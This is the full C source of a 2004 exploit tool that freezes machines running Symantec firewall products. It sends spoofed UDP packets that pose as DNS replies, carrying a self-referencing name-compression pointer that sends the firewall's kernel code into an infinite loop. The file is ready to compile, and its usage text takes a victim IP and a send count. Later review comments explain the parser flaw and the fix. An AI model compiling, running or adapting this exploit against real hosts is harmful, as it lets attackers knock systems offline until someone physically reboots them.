2004-05-14 Symantec Multiple Firewall DNS Response Denial of Service Exploit
/* HOD-symantec-firewall-DoS-expl.c:
 *
 * Symantec Multiple Firewall DNS Response Denial-of-Service
 *
 * Exploit version 0.1 coded by
 *
 *
 * .::[ houseofdabus ]::.
 *
 *
 *
 * Bug discovered by eEye:
 * http://www.eeye.com/html/Research/Advisories/AD20040512B.html 
 *
 * -------------------------------------------------------------------
 * Tested on:
 * - Symantec Norton Personal Firewall 2004
 *
 *
 * Systems Affected:
 * - Symantec Norton Internet Security 2002
 * - Symantec Norton Internet Security 2003
 * - Symantec Norton Internet Security 2004
 * - Symantec Norton Internet Security Professional 2002
 * - Symantec Norton Internet Security Professional 2003
 * - Symantec Norton Internet Security Professional 2004
 * - Symantec Norton Personal Firewall 2002
 * - Symantec Norton Personal Firewall 2003
 * - Symantec Norton Personal Firewall 2004 
 * - Symantec Client Firewall 5.01, 5.1.1 
 * - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)
 * - Symantec Norton AntiSpam 2004
 *
 * -------------------------------------------------------------------
 * Description:
 * eEye Digital Security has discovered a second vulnerability
 * in the Symantec firewall product line that can be remotely
 * exploited to cause a severe denial-of-service condition on
 * systems running a default installation of an affected version
 * of the product. By sending a single malicious DNS (UDP port 53)
 * response packet to a vulnerable host, an attacker can cause
 * the Symantec DNS response validation code to enter an infinite
 * loop within the kernel, amounting to a system freeze that requires
 * the machine to be physically rebooted in order to restore operation.
 *
 * -------------------------------------------------------------------
 * Compile:
 * Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib
 * Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib 
 * Linux : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall
 *
 * -------------------------------------------------------------------
 * Command Line Parameters/Arguments:
 *
 * HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int] 
 *
 * -fi:IP From (sender) IP address
 * -tp:int To (recipient) port number
 * -ti:IP To (recipient) IP address
 * -n:int Number of times to send message
 *
 */


#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN 
#include <winsock2.h>
#include <ws2tcpip.h> /* IP_HDRINCL */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/timeb.h>
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#endif

/* Size of the strMessage buffer; only sizeof(dnsreply)-1 bytes of it are ever
 * written or read, so it is far larger than needed. */
#define MAX_MESSAGE 4068
/* Size of the on-stack packet buffer in main() (IP + UDP header + payload). */
#define MAX_PACKET 4096

/* Default *source* port (main() uses it for udpHdr.src_portno): 53, so the
 * datagram looks like a reply from a DNS server.  The destination port
 * default is set separately in ValidateArgs(). */
#define DEFAULT_PORT 53
/* Initial value for both the from- and to-address until overridden. */
#define DEFAULT_IP "10.0.0.1"
/* Default number of datagrams to send. */
#define DEFAULT_COUNT 1

/* FAR is a legacy Win16/Win32 pointer qualifier used in the IP_HDR typedef;
 * it is empty on every other platform. */
#ifndef _WIN32
# define FAR
#endif


/* Define the DNS header: the 12-byte fixed header followed by a 2-byte name.
 * Bytes 12..13 (0xC0 0x0C) are a DNS name-compression pointer whose 14-bit
 * offset is 12, i.e. the pointer refers to its own position.  A name decoder
 * that follows pointers without a loop or back-reference check never
 * terminates, which is the condition this PoC reproduces.  Robust parsers
 * accept a pointer only if it points strictly backwards (offset < current
 * position) and cap the number of pointer hops.
 * Declared as a string literal, so sizeof(dnsreply) counts the trailing NUL;
 * every user of it subtracts 1. */
char dnsreply[] =
"\xc9\x9c" /* Transaction ID */
"\x80\x00" /* Flags (bit 15: response) */
"\x00\x01" /* Number of questions */
"\x00\x01" /* Number of answer RRs */
"\x00\x00" /* Number of authority RRs */
"\x00\x00" /* Number of additional RRs */
"\xC0\x0C"; /* Compressed name pointer: offset 12 = itself */


/* Define the IP header: the 20-byte IPv4 header in wire order.  With the usual
 * alignment rules the members already pack to 20 bytes; #pragma pack(1) is only
 * issued on Win32.  Multi-byte fields are filled in by main() in network byte
 * order (htons) or left 0.  The address members are `unsigned int` so that
 * they stay 4 bytes where `unsigned long` is 8. */
typedef struct ip_hdr {
 unsigned char ip_verlen; /* Version (high nibble) & header length in 32-bit words (low nibble) */
 unsigned char ip_tos; /* IP type of service */
 unsigned short ip_totallength; /* Total length, network byte order */
 unsigned short ip_id; /* Unique identifier */
 unsigned short ip_offset; /* Flags + fragment offset */
 unsigned char ip_ttl; /* Time to live */
 unsigned char ip_protocol; /* Protocol (0x11 = UDP) */
 unsigned short ip_checksum; /* IP header checksum (main() leaves it 0) */
 unsigned int ip_srcaddr; /* Source address, network byte order */
 unsigned int ip_destaddr; /* Destination address, network byte order */
} IP_HDR, *PIP_HDR, FAR* LPIP_HDR;

/* Define the UDP header: 8 bytes in wire order.  The checksum is computed by
 * main() over the pseudo-header + this header + payload. */
typedef struct udp_hdr {
 unsigned short src_portno; /* Source port number, network byte order */
 unsigned short dst_portno; /* Destination port number, network byte order */
 unsigned short udp_length; /* Length of header + payload, network byte order */
 unsigned short udp_checksum; /* UDP checksum (0 = not used; main() sets it) */
} UDP_HDR, *PUDP_HDR;


/* globals: filled in by ValidateArgs() from the defaults and the command line,
 * read by main().  Addresses are stored as returned by inet_addr() (network
 * byte order); ports are in host order until htons() in main(). */
unsigned long dwToIP, // IP to send to
 dwFromIP; // IP to send from (spoofed source address)
unsigned short iToPort, // Port to send to
 iFromPort; // Port to send from (spoofed source port)
unsigned long dwCount; // Number of times to send
char strMessage[MAX_MESSAGE]; // Message to send; only sizeof(dnsreply)-1 bytes are used



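/* Print the command-line synopsis to stdout and exit(1); never returns.
 * progname is normally argv[0].  argv[0] may be NULL when a program is
 * started with an empty argument vector, and passing NULL to "%s" is
 * undefined, so a fixed name is substituted in that case. */
void
usage(char *progname) {
	const char *name = progname ? progname : "HOD-symantec-firewall-DoS-expl";

	printf("Usage:\n\n");
	printf("%s <-fi:SRC-IP> <-ti:VICTIM-IP> [-tp:DST-PORT] [-n:int]\n\n", name);
	printf(" -fi:IP From (sender) IP address\n");
	printf(" -tp:int To (recipient) open UDP port number:\n");
	printf(" 137, 138, 445, 500(default)\n");
	printf(" -ti:IP To (recipient) IP address\n");
	printf(" -n:int Number of times\n");
	exit(1);
}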

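/* Parse one unsigned decimal number.  Accepts only a non-empty run of digits
 * whose value does not exceed 'max'; stores it in *out and returns 1 on
 * success, 0 otherwise.  (atoi/strtoul on their own silently accept "-1",
 * " 12" or "12x", and atoi truncates silently when stored in a short.) */
static int
parse_unsigned(const char *text, unsigned long max, unsigned long *out)
{
	char *end = NULL;
	unsigned long value;

	if (!isdigit((unsigned char)text[0]))
		return 0;
	value = strtoul(text, &end, 10);
	if (*end != '\0' || value > max)
		return 0;
	*out = value;
	return 1;
}

/* Fill the globals (dwFromIP, dwToIP, iToPort, iFromPort, dwCount, strMessage)
 * from the defaults and then from argv.  Options have the form "-xy:value"
 * (a leading '/' is accepted too); words that are not options are ignored.
 * An unknown option, a non-numeric or out-of-range port/count, or an address
 * inet_addr() cannot parse prints the usage text and exits. */
void
ValidateArgs(int argc, char **argv)
{
	int i;

	iToPort = 500;                 /* not DEFAULT_PORT: matches the list printed by usage() */
	iFromPort = DEFAULT_PORT;      /* 53, so the datagram looks like a DNS reply */
	dwToIP = inet_addr(DEFAULT_IP);
	dwFromIP = inet_addr(DEFAULT_IP);
	dwCount = DEFAULT_COUNT;
	memcpy(strMessage, dnsreply, sizeof(dnsreply) - 1);   /* drop the literal's NUL */

	for (i = 1; i < argc; i++) {
		const char *arg = argv[i];
		unsigned long num = 0;

		if (arg[0] != '-' && arg[0] != '/')
			continue;

		/* Cast to unsigned char: tolower() on a negative plain char is undefined. */
		switch (tolower((unsigned char)arg[1])) {
		case 'f':
			if (tolower((unsigned char)arg[2]) != 'i')
				usage(argv[0]);
			if (strlen(arg) > 4) {
				dwFromIP = inet_addr(&arg[4]);
				if (dwFromIP == INADDR_NONE)     /* malformed address (or 255.255.255.255) */
					usage(argv[0]);
			}
			break;
		case 't':
			switch (tolower((unsigned char)arg[2])) {
			case 'p':
				if (strlen(arg) > 4) {
					if (!parse_unsigned(&arg[4], 65535, &num))
						usage(argv[0]);
					iToPort = (unsigned short)num;
				}
				break;
			case 'i':
				if (strlen(arg) > 4) {
					dwToIP = inet_addr(&arg[4]);
					if (dwToIP == INADDR_NONE)
						usage(argv[0]);
				}
				break;
			default:
				usage(argv[0]);
				break;
			}
			break;
		case 'n':
			if (strlen(arg) > 3) {
				/* Values beyond ULONG_MAX saturate in strtoul; that is accepted. */
				if (!parse_unsigned(&arg[3], (unsigned long)-1, &num))
					usage(argv[0]);
				dwCount = num;
			}
			break;
		default:
			usage(argv[0]);
			break;
		}
	}
}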


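/* 16-bit one's-complement sum (RFC 1071) of 'size' bytes starting at 'buffer',
 * returned complemented, ready to be stored into a header in memory order.
 * The words are loaded with memcpy, so the buffer does not have to be
 * 2-byte aligned (main() hands in a plain char array).  A negative size is
 * treated as 0 rather than reading a byte past the caller's buffer.
 * NOTE(review): an odd trailing byte is added as a bare value, i.e. as the
 * low-order byte of its word; that matches memory order only on little-endian
 * hosts.  Every length passed in by this file is even. */
unsigned short
checksum(unsigned short *buffer, int size)
{
	const unsigned char *p = (const unsigned char *)buffer;
	unsigned long sum = 0;
	unsigned short word;

	if (size < 0)
		size = 0;

	/* Whole 16-bit words, in memory order. */
	while (size > 1) {
		memcpy(&word, p, sizeof word);
		sum += word;
		p += sizeof word;
		size -= (int)sizeof word;
	}
	if (size)
		sum += *p;

	/* Fold the carries back into 16 bits; two folds suffice for a 32-bit sum. */
	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);

	return (unsigned short)(~sum);
}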




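/* Entry point: print the banner, parse arguments, build one IPv4/UDP datagram
 * carrying dnsreply with a spoofed source, and send it dwCount times through
 * a raw socket with IP_HDRINCL.  Returns 0 when every send succeeded and -1
 * on any socket or send failure; usage() exits with 1 for bad arguments.
 * Raw sockets need administrator/root privileges on every platform. */
int
main(int argc, char **argv)
{
#ifdef _WIN32
	WSADATA wsd;
#endif
	int s = -1;                    /* raw socket; -1 until created */
	int hdrincl = 1;               /* IP_HDRINCL: we supply the IP header ourselves */
	int rc = -1;                   /* exit status */
	int ret;
	struct sockaddr_in remote;
	struct in_addr addr;           /* only for inet_ntoa() in the banner */
	IP_HDR ipHdr;
	UDP_HDR udpHdr;
	unsigned long i;
	unsigned short iTotalSize, iUdpSize, iUdpChecksumSize, iIPVersion, iIPSize;
	char buf[MAX_PACKET];
	char *ptr;
	const size_t payloadLen = sizeof(dnsreply) - 1;   /* drop the literal's NUL */

	printf("\nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1\n");
	printf("Bug discoveried by eEye:\n");
	printf("http://www.eeye.com/html/Research/Advisories/AD20040512B.html\n\n");
	printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

	if (argc < 3) usage(argv[0]);

	/* Parse command line arguments and print them out */
	ValidateArgs(argc, argv);
	addr.s_addr = dwFromIP;
	printf("[*] From IP: <%s>, port: %d\n", inet_ntoa(addr), iFromPort);
	addr.s_addr = dwToIP;
	printf("[*] To IP: <%s>, port: %d\n", inet_ntoa(addr), iToPort);
	printf("[*] Count: %lu\n", dwCount);   /* dwCount is unsigned long: %d was undefined */

#ifdef _WIN32
	if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {
		printf("[-] WSAStartup() failed: %lu\n", GetLastError());
		return -1;
	}
#endif
	/* Raw socket; because of IP_HDRINCL the kernel sends our buffer as the IP packet. */
	s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
#ifdef _WIN32
	if (s == INVALID_SOCKET) {
		printf("[-] socket() failed: %d\n", WSAGetLastError());
		goto out;
	}
#else
	if (s < 0) {
		perror("[-] socket()");
		goto out;
	}
#endif

	/* Enable the IP header include option; the original only checked this on Win32. */
	ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&hdrincl, sizeof hdrincl);
#ifdef _WIN32
	if (ret == SOCKET_ERROR) {
		printf("[-] setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError());
		goto out;
	}
#else
	if (ret < 0) {
		perror("[-] setsockopt(IP_HDRINCL)");
		goto out;
	}
#endif

	/* Initialize the IP header */
	iTotalSize = (unsigned short)(sizeof(ipHdr) + sizeof(udpHdr) + payloadLen);

	iIPVersion = 4;
	/* NOTE(review): IHL is counted in 32-bit words; this division assumes
	 * sizeof(unsigned long) == 4, which holds on ILP32 targets but not on LP64.
	 * Kept as in the original. */
	iIPSize = (unsigned short)(sizeof(ipHdr) / sizeof(unsigned long));

	ipHdr.ip_verlen = (unsigned char)((iIPVersion << 4) | iIPSize);
	ipHdr.ip_tos = 0;                          /* IP type of service */
	ipHdr.ip_totallength = htons(iTotalSize);  /* Total packet len */
	ipHdr.ip_id = 0;                           /* Unique identifier: set to 0 */
	ipHdr.ip_offset = 0;                       /* Fragment offset field */
	ipHdr.ip_ttl = 128;                        /* Time to live */
	ipHdr.ip_protocol = 0x11;                  /* Protocol (UDP) */
	ipHdr.ip_checksum = 0;                     /* left 0 as in the original; Linux fills it in for IP_HDRINCL */
	ipHdr.ip_srcaddr = (unsigned int)dwFromIP; /* Source address (spoofed) */
	ipHdr.ip_destaddr = (unsigned int)dwToIP;  /* Destination address */

	/* Initialize the UDP header */
	iUdpSize = (unsigned short)(sizeof(udpHdr) + payloadLen);

	udpHdr.src_portno = htons(iFromPort);
	udpHdr.dst_portno = htons(iToPort);
	udpHdr.udp_length = htons(iUdpSize);
	udpHdr.udp_checksum = 0;                   /* must be 0 while the checksum is computed */

	/* UDP checksum input: pseudo-header (src, dst, zero, proto, length),
	 * then the UDP header and the payload.  buf is zeroed first so the
	 * skipped "zero" byte really is 0. */
	memset(buf, 0, sizeof buf);
	ptr = buf;
	memcpy(ptr, &ipHdr.ip_srcaddr, sizeof ipHdr.ip_srcaddr);   ptr += sizeof ipHdr.ip_srcaddr;
	memcpy(ptr, &ipHdr.ip_destaddr, sizeof ipHdr.ip_destaddr); ptr += sizeof ipHdr.ip_destaddr;
	ptr++;                                                     /* zero byte */
	memcpy(ptr, &ipHdr.ip_protocol, sizeof ipHdr.ip_protocol); ptr += sizeof ipHdr.ip_protocol;
	memcpy(ptr, &udpHdr.udp_length, sizeof udpHdr.udp_length); ptr += sizeof udpHdr.udp_length;
	memcpy(ptr, &udpHdr, sizeof udpHdr);                       ptr += sizeof udpHdr;
	memcpy(ptr, strMessage, payloadLen);                       ptr += payloadLen;
	iUdpChecksumSize = (unsigned short)(ptr - buf);

	/* checksum() returns the value in memory order, so no htons() here. */
	udpHdr.udp_checksum = checksum((unsigned short *)buf, iUdpChecksumSize);

	/* Now the packet as sent: IP header, UDP header, payload. */
	memset(buf, 0, sizeof buf);
	ptr = buf;
	memcpy(ptr, &ipHdr, sizeof ipHdr);   ptr += sizeof ipHdr;
	memcpy(ptr, &udpHdr, sizeof udpHdr); ptr += sizeof udpHdr;
	memcpy(ptr, strMessage, payloadLen);

	memset(&remote, 0, sizeof remote);
	remote.sin_family = AF_INET;
	remote.sin_port = htons(iToPort);
	remote.sin_addr.s_addr = dwToIP;

	rc = 0;
	for (i = 0; i < dwCount; i++) {
		ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *)&remote, sizeof remote);
#ifdef _WIN32
		if (ret == SOCKET_ERROR) {
			printf("[-] sendto() failed: %d\n", WSAGetLastError());
			rc = -1;
			break;
		}
#else
		if (ret < 0) {               /* the original printed "sent -1 bytes" and kept going */
			perror("[-] sendto()");
			rc = -1;
			break;
		}
#endif
		printf("[+] sent %d bytes\n", ret);
	}

out:
#ifdef _WIN32
	if (s != INVALID_SOCKET) closesocket(s);
	WSACleanup();
#else
	if (s >= 0) close(s);            /* the original leaked the descriptor on POSIX */
#endif

	return rc;
}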